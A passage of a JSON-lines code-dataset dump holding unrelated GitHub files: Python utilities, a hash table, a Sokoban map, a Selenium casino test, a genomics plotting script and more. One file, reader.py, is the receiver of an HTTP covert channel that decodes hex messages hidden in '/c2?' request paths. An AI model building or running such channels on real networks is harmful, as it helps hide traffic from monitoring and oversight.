(C-A)*(D-B)\n area2 = (H-F)*(G-E)\n commonarea = max(0, min(C,G)-max(A,E))*max(0, min(D,H)-max(B,F))\n return area1+area2-commonarea\n 
\n\n","repo_name":"sharonLuo/LeetCode_py","sub_path":"rectangle-area.py","file_name":"rectangle-area.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"11872759343","text":"import pyshark \nimport os\nimport binascii\nimport sys\ncapture = pyshark.LiveCapture(interface='lo', display_filter='http', only_summaries=False)\nmessage=[]\ncount= 0\ncheck =[]\nstart=False\nfor packet in capture.sniff_continuously():\n #GET /c2?4157 HTTP/1.1\\r\\n\n packet=str(packet)\n try:\n data=packet.split(\"GET \")[1].split(\" \")[0].split(\"/c\")[1].split(\"?\")[0]\n check.append(data) \n if(len(check)==6 and check=='2D2D2D'): \n start=True \n check =[]\n elif(len(check)==6 and check=='2D2E2D'):\n break\n if(start):\n count += 1 \n message.append(data)\n mess=''.join(message)\n if(count==2):\n os.system(\"clear\")\n newmess = binascii.unhexlify(mess).decode()\n print(newmess)\n count = 0\n except:\n continue\ncapture.close()\nexit()\n","repo_name":"McSloats/HTTP_Covert_Channel","sub_path":"CCFinal/src/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"19564203537","text":"import json\nimport traceback\nimport json\nimport requests\n\nfrom tasks.api_keys import KeyRing\nfrom server.entities.plugin_manager import PluginManager\nfrom server.entities.resource_types import ResourceType\nfrom tasks.tasks import celery_app\nfrom server.entities.plugin_result_types import PluginResultStatus\n\n\n# Which resources are this plugin able to work with\nRESOURCE_TARGET = [ResourceType.IPv4, ResourceType.DOMAIN]\n\n# Plugin Metadata {a description, if target is actively reached and name}\nPLUGIN_AUTOSTART = False\nPLUGIN_DESCRIPTION = (\n \"Lookup onyphe.io wether this IP or Domain is included in threatlists\"\n)\nPLUGIN_IS_ACTIVE = False\nPLUGIN_DISABLE = False\nPLUGIN_NAME = \"onyphe\"\nPLUGIN_NEEDS_API_KEY = True\n\nAPI_KEY = KeyRing().get(\"onyphe\")\nAPI_KEY_IN_DDBB = bool(API_KEY)\nAPI_KEY_DOC = \"https://www.onyphe.io/documentation/api\"\nAPI_KEY_NAMES = [\"onyphe\"]\n\n\nclass Plugin:\n def __init__(self, resource, project_id):\n self.project_id = project_id\n self.resource = resource\n\n def do(self):\n resource_type = self.resource.get_type()\n\n try:\n to_task = {\n \"resource\": self.resource.get_data()[\"canonical_name\"],\n \"resource_id\": self.resource.get_id_as_string(),\n \"project_id\": self.project_id,\n \"resource_type\": resource_type.value,\n \"plugin_name\": PLUGIN_NAME,\n }\n onyphe.delay(**to_task)\n\n except Exception as e:\n tb1 = traceback.TracebackException.from_exception(e)\n print(\"\".join(tb1.format()))\n\n\n@celery_app.task\ndef onyphe(plugin_name, project_id, resource_id, resource_type, resource):\n result_status = PluginResultStatus.STARTED\n query_result = None\n\n try:\n API_KEY = KeyRing().get(\"onyphe\")\n if not API_KEY:\n print(\"No API key...!\")\n result_status = PluginResultStatus.NO_API_KEY\n\n else:\n url = \"\"\n headers = {\n \"Authorization\": f\"apikey {API_KEY}\",\n \"Content-Type\": \"application/json\",\n }\n\n if resource_type == \"domain\":\n url = f\"https://www.onyphe.io/api/v2/summary/domain/{resource}\"\n elif resource_type == \"ip\":\n url = f\"https://www.onyphe.io/api/v2/summary/ip/{resource}\"\n\n query_result = requests.get(url, headers=headers)\n\n if query_result.status_code == 200:\n json_results = 
query_result.json()\n\n if json_results[\"results\"] == []:\n result_status = PluginResultStatus.RETURN_NONE\n else:\n query_result = json_results[\"results\"]\n result_status = PluginResultStatus.COMPLETED\n\n else:\n result_status = PluginResultStatus.FAILED\n\n PluginManager.set_plugin_results(\n resource_id, plugin_name, project_id, query_result, result_status\n )\n\n except Exception as e:\n tb1 = traceback.TracebackException.from_exception(e)\n print(\"\".join(tb1.format()))\n","repo_name":"ElevenPaths/thethe_server","sub_path":"server/plugins/onyphe.py","file_name":"onyphe.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"} +{"seq_id":"34356537919","text":"# Syed Khurshid, SID:010081191\n\n\n# Creating a HashTable class using chaining\n# -> O(N)\nclass HashingData:\n # Constructor with optional initial capacity parameter\n # Buckets are assigned to an empty list -> O(N)\n def __init__(self, initial_capacity=10):\n self.data = []\n for _ in range(initial_capacity):\n self.data.append([])\n\n # Generating hash-key which is a O(1)\n def hash_key_generator(self, key):\n return hash(key) % len(self.data)\n\n # Inserting a new item into the hash table -> O(N)\n def insert(self, key, item):\n Hkey = self.hash_key_generator(key)\n # First to check if the Hash Key does exist of not\n if self.data[Hkey] == None:\n self.data[Hkey] = [key, item]\n return True # End the function to continue to add more later\n else:\n for keyValue in self.data[Hkey]:\n if keyValue[0] == key:\n keyValue[1] = item\n return True\n\n self.data[Hkey].append([key, item])\n return True\n\n # Searching for an item with matching key in the hash table\n # Returns the item if not found, or None if not found -> O(N)\n def search(self, key):\n # get the bucket list where the key is located\n Hkey = self.hash_key_generator(key)\n # In case the key doesn't exist\n if self.data[Hkey] != None:\n for items in self.data[Hkey]:\n if items[0] == key:\n return items[1]\n return None\n\n # Removes an item with matching key from hash table. 
-> O(N)\n    def delete(self, key):\n        Hkey = self.hash_key_generator(key)\n        bucket_list = self.data[Hkey]\n        if self.data[Hkey] == None:\n            return False\n        else:\n            for keyValue in bucket_list:\n                if keyValue[0] == key:\n                    # list.remove takes a single value: remove the [key, item] pair itself\n                    bucket_list.remove(keyValue)\n                    return True\n            return False\n\n    # To Update the item in a key -> O(N)\n    def update(self, key, value):\n        Hkey = self.hash_key_generator(key)\n        # Now to search for hashed line item if its been found or not\n        if self.data[Hkey] != None:\n            # Now if they match then we update the second list in the data\n            for items in self.data[Hkey]:\n                if items[0] == key:\n                    items[1] = value\n                    return True # This should stop any further updates\n            # In case the key doesn't match\n            return None\n\n    # This is to get the self table -> O(1)\n    def get_hash_Table(self):\n        return self.data\n","repo_name":"kurogosane1/WGU_C950-Version2-","sub_path":"hashingData.py","file_name":"hashingData.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"9361232597","text":"# импорт модели объекта\r\nfrom gameobject import GameObject\r\n\r\n# импорт дополнительных объектов\r\nfrom objects import *\r\n\r\n# импорт дополнительных функций\r\nfrom functions import *\r\n\r\n\r\nclass Map:\r\n    \"\"\"\r\n    Инициализация и логика работы карты уровня.\r\n    \"\"\"\r\n\r\n    def __init__(self, path: str, name: str, ground_color: str) -> None:\r\n        self.map = load_map(path, name)  # загрузка карты из текстового фала\r\n        self.height, self.width, self.tile_size = 0, 0, 0  # инициализация переменных\r\n        self.level = 1  # текущий уровень\r\n\r\n        # спрайты\r\n        self.crates = crates  # ящики\r\n        self.install_locations = install_locations  # места для установки ящиков\r\n        self.blocks = blocks  # стены\r\n        self.ground = ground  # земля\r\n\r\n        # группы спрайтов\r\n        self.crates_group = pygame.sprite.Group()  # ящики\r\n        self.install_locations_group = pygame.sprite.Group()  # места для установки ящиков\r\n        self.blocks_group = pygame.sprite.Group()  # стены\r\n        self.ground_group = pygame.sprite.Group()  # земля\r\n\r\n        # соотнесение чисел в текстовом файле карты уровня и объектов в игре\r\n        self.number_guide = \\\r\n            {1: [self.blocks_group, self.blocks, 'gray', 'block'],  # стены: 1-4\r\n             2: [self.blocks_group, self.blocks, 'brown', 'block'],\r\n             3: [self.blocks_group, self.blocks, 'red', 'block'],\r\n             4: [self.blocks_group, self.blocks, 'd_red', 'block'],\r\n\r\n             5: [self.crates_group, self.crates, 'gray', 'crate'],  # ящики: 5-14\r\n             6: [self.crates_group, self.crates, 'brown', 'crate'],\r\n             7: [self.crates_group, self.crates, 'red', 'crate'],\r\n             8: [self.crates_group, self.crates, 'blue', 'crate'],\r\n             9: [self.crates_group, self.crates, 'green', 'crate'],\r\n             10: [self.crates_group, self.crates, 'd_gray', 'crate'],\r\n             11: [self.crates_group, self.crates, 'd_brown', 'crate'],\r\n             12: [self.crates_group, self.crates, 'd_red', 'crate'],\r\n             13: [self.crates_group, self.crates, 'd_blue', 'crate'],\r\n             14: [self.crates_group, self.crates, 'd_green', 'crate'],\r\n\r\n             15: [self.install_locations_group, self.install_locations, 'gray', 'install'],  # установка ящиков: 15-19\r\n             16: [self.install_locations_group, self.install_locations, 'brown', 'install'],\r\n             17: [self.install_locations_group, self.install_locations, 'red', 'install'],\r\n             18: [self.install_locations_group, self.install_locations, 'blue', 'install'],\r\n             19: [self.install_locations_group, self.install_locations, 'green', 'install']}\r\n\r\n        # список 
размещенных на карте объектов (их классы) кроме земли и мест для установки ящиков\r\n self.objects_list = list()\r\n\r\n # список координат каждого места для установки ящика\r\n self.install_locations_list = list()\r\n\r\n # список уже установленных ящиков\r\n self.installed_crates = list()\r\n\r\n self.update_map(path, name, ground_color)\r\n\r\n # звуки\r\n self.crate_installed_sound = pygame.mixer.Sound(os.path.join('assets/sound', 'installed.wav'))\r\n self.crate_installed_sound.set_volume(0.2)\r\n\r\n def kill_sprites(self) -> None:\r\n \"\"\"\r\n Удалить все спрайты.\r\n \"\"\"\r\n for i in self.crates_group:\r\n i.kill()\r\n for i in self.install_locations_group:\r\n i.kill()\r\n for i in self.blocks_group:\r\n i.kill()\r\n for i in self.ground_group:\r\n i.kill()\r\n\r\n def update_map(self, path: str, name: str, ground_color: str) -> None:\r\n \"\"\"\r\n Обновить карту (перейти на другой уровень).\r\n \"\"\"\r\n self.map = load_map(path, name)\r\n self.level = name.split('.')[0][-1]\r\n self.kill_sprites()\r\n self.objects_list = list()\r\n self.install_locations_list = list()\r\n self.init_map(ground_color)\r\n\r\n def init_map(self, ground_color: str) -> None:\r\n \"\"\"\r\n Инициализировать новую карту: создать все спрайты.\r\n \"\"\"\r\n self.height = len(self.map)\r\n self.width = len(self.map[0])\r\n self.tile_size = 64\r\n\r\n for y in range(self.height):\r\n for x in range(self.width):\r\n if self.map[y][x] != 0:\r\n a = self.number_guide[self.map[y][x]]\r\n if a[3] == 'install':\r\n GameObject(a[0], a[1], a[2], a[3], x, y)\r\n self.install_locations_list.append([(x, y), a[2]])\r\n self.change_map((x, y), 0)\r\n else:\r\n self.objects_list.append(GameObject(a[0], a[1], a[2], a[3], x, y))\r\n GameObject(self.ground_group, self.ground, ground_color, 'ground', x, y)\r\n\r\n def change_map(self, pos: tuple, value: int) -> None:\r\n \"\"\"\r\n Изменение значения в позиции *pos* на *value* в главной переменной класса.\r\n \"\"\"\r\n self.map[pos[1]][pos[0]] = value\r\n\r\n def change_sprite_pos(self, pos1: tuple, pos2: tuple) -> None:\r\n \"\"\"\r\n Изменить позицию у определенного спрайта на карте.\r\n \"\"\"\r\n for i in self.objects_list:\r\n if i.get_pos() == pos1:\r\n i.set_pos(pos2)\r\n\r\n def get_sprite_type(self, pos: tuple) -> str:\r\n \"\"\"\r\n Получить тип спрайта (земля, стена...).\r\n \"\"\"\r\n for i in self.objects_list:\r\n if i.get_pos() == pos:\r\n return i.get_type()\r\n\r\n def check_free(self, x: int, y: int) -> bool:\r\n \"\"\"\r\n Проверяет, свободен ли заданный участок\r\n \"\"\"\r\n if self.map[y][x] == 0:\r\n return True\r\n return False\r\n\r\n def move_crate(self, crate_pos: tuple, x: int, y: int) -> tuple:\r\n \"\"\"\r\n Возв��ащает координаты перемещенного ящика, если возможно совершить это действие.\r\n \"\"\"\r\n if self.get_sprite_type((crate_pos[0], crate_pos[1])) == 'crate':\r\n if self.check_free(crate_pos[0] + x, crate_pos[1] + y):\r\n return crate_pos[0] + x, crate_pos[1] + y\r\n return -1, -1\r\n\r\n def check_installed(self) -> bool:\r\n \"\"\"\r\n Добавляет все ящики, расположенные на правильных местах, в список. 
Возвращает True, если ВСЕ ящики расположены\r\n на правильных местах.\r\n \"\"\"\r\n a = len(self.installed_crates)\r\n self.installed_crates = list()\r\n for i in self.objects_list:\r\n for j in self.install_locations_list:\r\n if i.get_pos() == j[0] and i.get_color() == j[1]:\r\n self.installed_crates.append(i)\r\n if len(self.installed_crates) > a:\r\n self.crate_installed_sound.play()\r\n if len(self.installed_crates) == len(self.install_locations_list):\r\n return True\r\n return False\r\n","repo_name":"Merlyan0/Sokoban","sub_path":"map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":7829,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"5903243066","text":"# Keep the header open in the left pane\nimport sublime\nimport sublime_plugin\n\nimport os.path\n\nclass HeaderAssistant(sublime_plugin.WindowCommand):\n def run(self):\n fullname = os.path.basename(self.window.active_view().file_name())\n basename, extension = os.path.splitext(fullname)\n\n # File extension mappings\n mappings = { \".cpp\": \".h\", \".h\": \".cpp\" }\n if extension in mappings:\n search = basename + mappings[extension]\n else:\n search = basename\n\n self.window.run_command(\"show_overlay\", args={\n \"overlay\": \"goto\",\n \"show_files\": True,\n \"text\": search\n })\n","repo_name":"315234/HeaderAssistant","sub_path":"HeaderAssistant.py","file_name":"HeaderAssistant.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"21283619435","text":"import requests\nimport sys\nfrom contextlib import contextmanager\nimport subprocess\nimport io\nfrom functools import wraps\nimport pprint\nimport itertools\nimport xml.etree.ElementTree\n\nimport drawSvg as draw # pip install drawSvg\n\nserver = 'http://rest.ensembl.org'\n\n@contextmanager\ndef get(path, **headers):\n\tr = requests.get(path, headers=headers)\n\tif not r.ok:\n\t\tprint('ensembl API unavailable')\n\t\tr.raise_for_status()\n\tyield r\n\n\n@contextmanager\ndef run(*process, stdin=''):\n\tp = subprocess.run(process, input=stdin, capture_output=True, text=True)\n\tif p.returncode != 0:\n\t\tprint(p.stderr)\n\t\tp.check_returncode()\n\tyield p.stdout\n\n\ndef fasta(taxon, species, chromosome, start, end):\n\twith get(f'{server}/sequence/region/{species}/{chromosome}:{start}..{end}:1?', content_type='text/x-fasta') as r:\n\t\treturn r.text\n\n\ndef fetch_genes(taxon, species, chromosome, start, end):\n\twith get(f'{server}/overlap/region/{species}/{chromosome}:{start}..{end}:1?feature=gene', content_type='application/json') as r:\n\t\treturn r.json()\n\n\ndef fetch_transcript(gene):\n\twith get(f'https://www.uniprot.org/uniprot?query={gene}&format=xml') as r:\n\t\txmlContent = xml.etree.ElementTree.fromstring(r.text)\n\t\treturn xmlContent.findall(\".//*[@type='EnsemblBacteria']/*[@type='protein sequence ID']\")[0].get('value')\n\n\ndef on_adler(command, fasta):\n\twith run('ssh', 'Adler', command, stdin=fasta) as output:\n\t\treturn output\n\n\ndef run_fgs(fasta):\n\treturn on_adler(('/data/felix/FragGeneScanPlusPlus/FGSpp -s stdin -o stdout -w 0 -r \"/data/felix/FragGeneScanPlusPlus/train\" -t \"illumina_10\" -p 16 -c 240 |'\n\t '~/.cargo/bin/umgap prot2kmer2lca -o /data/felix/database/2020-12-02/ninemer.fst |'\n\t \"sed 's/^0$/1/' |\" # no match means root\n\t '~/.cargo/bin/umgap taxonomy -a -H /data/felix/database/2020-12-02/taxons.tsv' # get full taxonomy\n\t ), fasta)\n\n\ndef 
run_fgsrs(fasta):\n\treturn on_adler(('~/.cargo/bin/FragGeneScanRs -r \"/data/felix/frag_gene_scan_rs/train\" -t \"illumina_10\" |'\n\t '~/.cargo/bin/umgap prot2kmer2lca -o /data/felix/database/2020-12-02/ninemer.fst |'\n\t \"sed 's/^0$/1/' |\" # no match means root\n\t '~/.cargo/bin/umgap taxonomy -a -H /data/felix/database/2020-12-02/taxons.tsv' # get full taxonomy\n\t ), fasta)\n\n\ndef run_6ft(fasta):\n\treturn on_adler(('~/.cargo/bin/umgap translate -a -n |'\n\t '~/.cargo/bin/umgap prot2kmer2lca -o /data/felix/database/2020-12-02/ninemer.fst |'\n\t \"sed 's/^0$/1/' |\" # no match means root\n\t '~/.cargo/bin/umgap taxonomy -a -H /data/felix/database/2020-12-02/taxons.tsv' # get full taxonomy\n\t ), fasta)\n\n\ndef get_lineage(taxon):\n\treturn on_adler('~/.cargo/bin/umgap taxonomy -H -a /data/felix/database/2020-12-02/taxons.tsv',\n\t str(taxon))\n\nclass Marker:\n\n\t__slots__ = [ 'start', 'end', 'frame', 'color', 'opacity' ]\n\n\tdef __init__(self, start, end, frame, color='black', opacity=1):\n\t\tself.start = start\n\t\tself.end = end\n\t\tself.frame = frame\n\t\tself.color = color\n\t\tself.opacity = opacity\n\n\tdef translate(self, y):\n\t\tself.frame += y\n\n\tdef draw(self, d, scale, margin, height_per_frame, frames):\n\t\td.append(draw.Line(\n\t\t\tself.start * scale,\n\t\t\tframes * height_per_frame - self.frame * height_per_frame - height_per_frame / 2,\n\t\t\tself.end * scale,\n\t\t\tframes * height_per_frame - self.frame * height_per_frame - height_per_frame / 2,\n\t\t\tstroke=self.color,\n\t\t\tstroke_width=5,\n\t\t\tstroke_linecap='round',\n\t\t\topacity=self.opacity))\n\n\nclass Strand:\n\n\t__slots__ = [ 'start', 'end', 'frame', 'text' ]\n\n\tdef __init__(self, start, end, frame):\n\t\tself.start = start\n\t\tself.end = end\n\t\tself.frame = frame\n\t\tself.text = ['1', '2', '3', '-1', '-2', '-3'][frame]\n\n\tdef translate(self, y):\n\t\tself.frame += y\n\n\tdef draw(self, d, scale, margin, height_per_frame, frames):\n\t\td.append(draw.Line(\n\t\t\tself.start * scale,\n\t\t\tframes * height_per_frame - self.frame * height_per_frame - height_per_frame / 2,\n\t\t\tself.end * scale,\n\t\t\tframes * height_per_frame - self.frame * height_per_frame - height_per_frame / 2,\n\t\t\tstroke='#000000',\n\t\t\t#stroke_width=1,\n\t\t\tstroke_linecap='round'))\n\t\td.append(draw.Text(self.text, 10,\n\t\t\t-4,\n\t\t\t(frames - self.frame - 1/2) * height_per_frame,\n\t\t\ttext_anchor='end',\n\t\t\talignment_baseline='middle'))\n\n\nclass Annotation:\n\n\t__slots__ = [ 'start', 'end', 'text', 'frame', 'color' ]\n\n\tdef __init__(self, start, end, text, frame, color='000000'):\n\t\tself.start = start\n\t\tself.end = end\n\t\tself.text = text\n\t\tself.frame = frame\n\t\tself.color = color\n\n\tdef translate(self, y):\n\t\t# self.frame += y # annotation on gene\n\t\tpass # annotation on top\n\n\tdef draw(self, d, scale, margin, height_per_frame, frames):\n\t\td.append(draw.Text(self.text, 14, \n\t\t (self.start + self.end) / 2 * scale,\n\t\t # (frames - self.frame - 1/2) * height_per_frame, # annotation on gene\n\t\t (frames - 1) * height_per_frame, # annotation on top\n\t\t text_anchor='middle',\n\t\t alignment_baseline='middle'))\n\n\ndef strip_lineage(lineage):\n\treturn '\\t'.join(lineage.strip().rstrip('\\t').split('\\t')[3:])\n\n\ndef translate(y, markers):\n\tfor marker in markers:\n\t\tmarker.translate(y)\n\t\tyield marker\n\n\ndef parse_6ft(width, reflineage, sixft):\n\tframe = -1\n\toffsets = [0, 1, 3, 0, 1, 2]\n\tforward = [True] * 3 + [False] * 3\n\tfor line in 
sixft.split('\\n'):\n\t\tif line.startswith('>'):\n\t\t\tframe += 1\n\t\t\tyield Strand(0, width, frame)\n\t\t\tstart = 0\n\t\telse:\n\t\t\tcurlineage = strip_lineage(line)\n\t\t\tcolor = '#2e7d32' if reflineage.startswith(curlineage) else '#f44336'\n\t\t\topacity = sum(c == '\\t' for c in curlineage) / 60\n\t\t\tgenestart = 3 * start + offsets[frame] if forward[frame] else width - 3 * start + offsets[frame] - 9*3 - 3\n\t\t\tyield Marker(genestart, genestart + 3, frame, color=color, opacity=opacity)\n\t\t\tstart += 1\n\n\ndef parse_fgs(width, reflineage, fgs):\n\tfor frame in range(6):\n\t\tyield Strand(0, width, frame)\n\tfor line in fgs.split('\\n'):\n\t\tif line.startswith('>'):\n\t\t\t*_, start, end, strand = line.strip().split('_')\n\t\t\tstart, end, strand = int(start) - 1, int(end), strand == '+'\n\t\t\tframe = toframe(strand, start, end - 1, width)\n\t\t\tyield Marker(start, end, frame, color='#1565c0')\n\t\t\toffset = 0\n\t\telse:\n\t\t\tcurlineage = strip_lineage(line)\n\t\t\tcolor = '#2e7d32' if reflineage.startswith(curlineage) else '#f44336'\n\t\t\topacity = sum(c == '\\t' for c in curlineage) / 60\n\t\t\tgenestart = start + offset if strand else end - offset - 9*3 - 5\n\t\t\tyield Marker(genestart, genestart + 3, frame + 0.5, color=color, opacity=opacity)\n\t\t\toffset += 3\n\n\ndef parse_genes(start, width, genes):\n\tfor frame in range(6):\n\t\tyield Strand(0, width, frame)\n\tfor gene in genes:\n\t\tframe = toframe(gene['strand'] > 0, gene['start'] - start, gene['end'] - start, width)\n\t\tyield Marker(max(gene['start'] - start, 0),\n\t\t min(gene['end'] - start, width),\n\t\t frame,\n\t\t color='#ff8f00')\n\t\tname = gene.get('transcript', gene['id'])\n\t\tyield Annotation(max(gene['start'] - start, 0),\n\t\t min(gene['end'] - start, width),\n\t\t name,\n\t\t frame,\n\t\t color='#ff8f00')\n\n\ndef toframe(f, s, e, width):\n\tif f:\n\t\treturn s % 3\n\telse:\n\t\treturn 3 + (width - e) % 3\n\n\ndef main(imgfile, taxon, species, chromosome, start, end):\n\twidth = end - start\n\tread = fasta(taxon, species, chromosome, start, end)\n\tlineage = strip_lineage(get_lineage(taxon))\n\tgenes = fetch_genes(taxon, species, chromosome, start, end)\n\tfor gene in genes:\n\t\tgene['transcript'] = fetch_transcript(gene['id'])\n\tgene_markers = translate(2, parse_genes(start, width, genes))\n\tfgs_markers = translate(11, parse_fgs(width, lineage, run_fgs(read)))\n\tfgsrs_markers = translate(20, parse_fgs(width, lineage, run_fgsrs(read)))\n\tft6_markers = translate(29, parse_6ft(width, lineage, run_6ft(read)))\n\n\tmargin = 20\n\theight_per_frame = 10\n\tframes = 36\n\ttargetwidth = 700\n\td = draw.Drawing(targetwidth + 2 * margin, margin + frames * height_per_frame, origin=(-margin, -margin))\n\tfor element in itertools.chain(gene_markers, ft6_markers, fgs_markers, fgsrs_markers):\n\t\telement.draw(d, targetwidth / width, margin, height_per_frame, frames)\n\n\tdef title(s, h):\n\t\td.append(draw.Text(s, 14, 0, (frames - h) * height_per_frame, alignment_baseline='middle'))\n\ttitle('RefSeq', 1.5)\n\ttitle('FGS++', 10.5)\n\ttitle('FGSrs', 19.5)\n\ttitle('six-frame translation', 28.5)\n\n\td.saveSvg(imgfile)\n\n\nA0A009H596 = ('image.png', 470, 'Acinetobacter_baumannii_118362_gca_000580515', 'ab118362.contig.17_1', 53253, 55397)\ninteresting = ('image.svg', 470, 'Acinetobacter_baumannii_118362_gca_000580515', 'ab118362.contig.8_1', 38308, 40888)\nother = ('image.png', 470, 'Acinetobacter_baumannii_118362_gca_000580515', 'ab118362.contig.8_1', 23000, 26000)\nchosen = ('final-raw.svg', 470, 
'Acinetobacter_baumannii_118362_gca_000580515', 'ab118362.contig.8_1', 37700, 39530)\nexperiment_fgs = ('fgsfgs.svg', 470, 'Acinetobacter_baumannii_118362_gca_000580515', 'ab118362.contig.8_1', 37700, 39530)\nexperiment_rs = ('fgsrs.svg', 470, 'Acinetobacter_baumannii_118362_gca_000580515', 'ab118362.contig.8_1', 37700, 39530)\n","repo_name":"ninewise/dissertation","sub_path":"umgap/figures/6ft-figure/fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":9073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"21052405776","text":"'''\nCreated on Aug 14, 2018\n\n@author: Daryoush\n'''\n\nfrom CasinoAuto.Locators.UIMapCasinoPage import CasinoPageMapXpath\nfrom CasinoAuto.Locators.UIMapCasinoPage import SearchResult\nfrom CasinoAuto.Locators.UIMapCasinoPage import LogInPageMap\nfrom CasinoAuto.Constants import Casino_Constants\nfrom MatchBookLoginPage import MatchBookLoginPage\nfrom BasePage import BasePage\nfrom CasinoAuto.Locators.UIMapHomePage import HomePageMapXpath\nimport time\nclass CasinoPage(BasePage):\n    def __init__(self, driver):\n        super(CasinoPage, self).__init__(driver)\n        #self.nhl = self.driver.find_element(CasinoPageMapXpath[\"lhncasinoLocatorXpath\"])\n        #self.nhl.click()\n        #self.driver.navigate_to_page(\"https://dev06.xcl.ie/casino\")\n\n# defining the casino page object here\n    def _verify_page(self):\n        try:\n            self.wait_for_element_visibility(10, \"cssSelector\", CasinoPageMapXpath[\"newgameLocator\"])\n        except:\n            raise Exception(\"newgameLocator is not accessible\")\n        try:\n            self.wait_for_element_visibility(10, \"cssSelector\", CasinoPageMapXpath[\"popularLocator\"])\n        except:\n            raise Exception(\"popularLocator is not accessible\")\n        try:\n            self.wait_for_element_visibility(10, \"cssSelector\", CasinoPageMapXpath[\"jackpotsLcoator\"])\n        except:\n            raise Exception(\"jackpotsLcoator is not accessible\")\n        try:\n            self.wait_for_element_visibility(10, \"cssSelector\", CasinoPageMapXpath[\"slotgameLcoator\"])\n        except:\n            raise Exception(\"slotgameLcoator is not accessible\")\n        try:\n            self.wait_for_element_visibility(10, \"cssSelector\", CasinoPageMapXpath[\"tablegametablocator\"])\n        except:\n            raise Exception(\"tablegametablocator is not accessible\")\n        try:\n            self.wait_for_element_visibility(10, \"cssSelector\", CasinoPageMapXpath[\"videopokerlocator\"])\n        except:\n            raise Exception(\"videopokerlocator is not accessible\")\n        try:\n            self.wait_for_element_visibility(10, \"cssSelector\", CasinoPageMapXpath[\"searchcasinoLocator\"])\n        except:\n            raise Exception(\"searchcasinoLocator is not accessible\")\n        try:\n            self.wait_for_element_visibility(10, \"cssSelector\", LogInPageMap[\"LoginButtonTop\"])\n        except:\n            raise Exception(\"LoginButtonTop is not accessible\")\n\n    def newgames(self):\n        self.click(10,\n                   \"cssSelector\",\n                   CasinoPageMapXpath[\"newgameLocator\"]\n                   )\n\n    def populargames(self):\n        self.click(10,\n                   \"cssSelector\",\n                   CasinoPageMapXpath[\"popularLocator\"]\n                   )\n\n    def jackpotgames(self):\n        self.click(10,\n                   \"cssSelector\",\n                   CasinoPageMapXpath[\"jackpotsLcoator\"]\n                   )\n\n    def slotgames(self):\n        self.click(10,\n                   \"cssSelector\",\n                   CasinoPageMapXpath[\"slotgameLcoator\"]\n                   )\n\n    def tablegames(self):\n        self.click(10,\n                   \"cssSelector\",\n                   CasinoPageMapXpath[\"tablegametablocator\"]\n                   )\n\n    def videopokergames(self):\n        self.click(10,\n                   \"cssSelector\",\n                   CasinoPageMapXpath[\"videopokerlocator\"]\n                   )\n\n    def livecasinolink(self):\n        self.click(10,\n                   \"cssSelector\",\n                   
CasinoPageMapXpath[\"liveDealer\"]\n )\n\n def searchcasinolink(self):\n self.click(10, \n \"cssSelector\",\n CasinoPageMapXpath[\"searchcasinoLocator\"]\n ) \n def submit_request_search(self,testitem):\n self.fill_out_field(\"cssSelector\",\n CasinoPageMapXpath['searchcasinoLocator'],\n testitem\n )\n return self \n def verifygamExisting(self,testitem2):\n try:\n self.find_element(\"cssSelector\", SearchResult[testitem2])\n except:\n raise Exception(testitem2 +\" is not displayed\")\n\n def click_logintop_button(self):\n self.click(10,\n \"cssSelector\",\n LogInPageMap['LoginButtonTop'])\n mainWindowHandle = self.driver.window_handles\n self.click(10,\n \"xpath\",\n LogInPageMap['LogInToMatchbookTextXpath']\n )\n allWindowHandles = self.driver.window_handles\n for handle in allWindowHandles:\n if handle != mainWindowHandle[0]:\n self.switch_to_window(handle)\n break\n log_obj = MatchBookLoginPage(self.driver,\n Casino_Constants['CAsino_Username'],\n Casino_Constants['Casino_Password']\n )\n log_obj.login()\n try:\n self.wait_for_element_visibility(10, \"cssSelector\", HomePageMapXpath[\"rhsaccount\"])\n element = self.find_element(\"cssSelector\", HomePageMapXpath[\"rhsaccount\"])\n element.click()\n self.wait_for_element_visibility(10, \"cssSelector\", CasinoPageMapXpath[\"Usernametitle\"])\n element = self.find_element(\"cssSelector\", CasinoPageMapXpath[\"Usernametitle\"])\n text1 = element.get_attribute('innerText')\n print(text1)\n if(text1==Casino_Constants[\"CAsino_Username\"]):\n print(\"Successful Log in\")\n except:\n print(\" user name is not displayed will try usernamebonus too\")\n\n try:\n self.wait_for_element_visibility(10, \"cssSelector\", CasinoPageMapXpath[\"bonususernametitle\"])\n element = self.find_element(\"cssSelector\", CasinoPageMapXpath[\"bonususernametitle\"])\n text1 = element.get_attribute('innerText')\n print(text1)\n if(text1==Casino_Constants[\"CAsino_Username\"]):\n print(\"Successful Log in\")\n except:\n print(\" user name has not assigned bonus yet\")\n\n","repo_name":"dtahouri775/August24","sub_path":"CasinoAuto/Pages/CasinoPage.py","file_name":"CasinoPage.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"28377891695","text":"# Fibonacci Fácil\nseq = int(input())\ndic = {0:0, 1:1, 2:1}\nfibonacci = []\n\nfor valor in range(seq):\n if valor <= 2:\n fibonacci.append(dic[valor])\n else:\n fibonacci.append(fibonacci[-1] + fibonacci[-2])\n \nprint(*fibonacci) \n \n\n","repo_name":"joaogui745/URI-Online-Judge","sub_path":"Python 3/1151 - Fibonacci Fácil.py","file_name":"1151 - Fibonacci Fácil.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26975575867","text":"import torch\nimport torch.nn.functional as F\nfrom torch import nn\nfrom utils.fmodule import FModule, get_module_from_model\nimport utils.fmodule as 